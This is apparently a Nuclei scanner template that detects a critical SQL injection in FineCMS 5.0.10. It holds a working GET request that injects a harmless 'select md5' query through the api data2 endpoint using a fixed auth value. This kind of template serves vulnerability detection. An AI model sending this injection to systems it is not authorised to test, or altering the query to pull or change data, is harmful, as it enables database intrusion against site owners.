id: finecms-sqli

info:
  name: FineCMS 5.0.10 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    FineCMS 5.0.10 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://blog.csdn.net/dfdhxb995397/article/details/101385340
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: finecms,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27'

    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'

# digest: 4a0a0047304502204f7cc4904db98732aed9a352be1e47713fb3d18430ec36ceee47fbd336f490cb022100c31e8d9da946cd496b9ec86b03136dd508268f473e921e7478f638cb7c78b4c3:922c64590222798bb761d5b6d8e72950
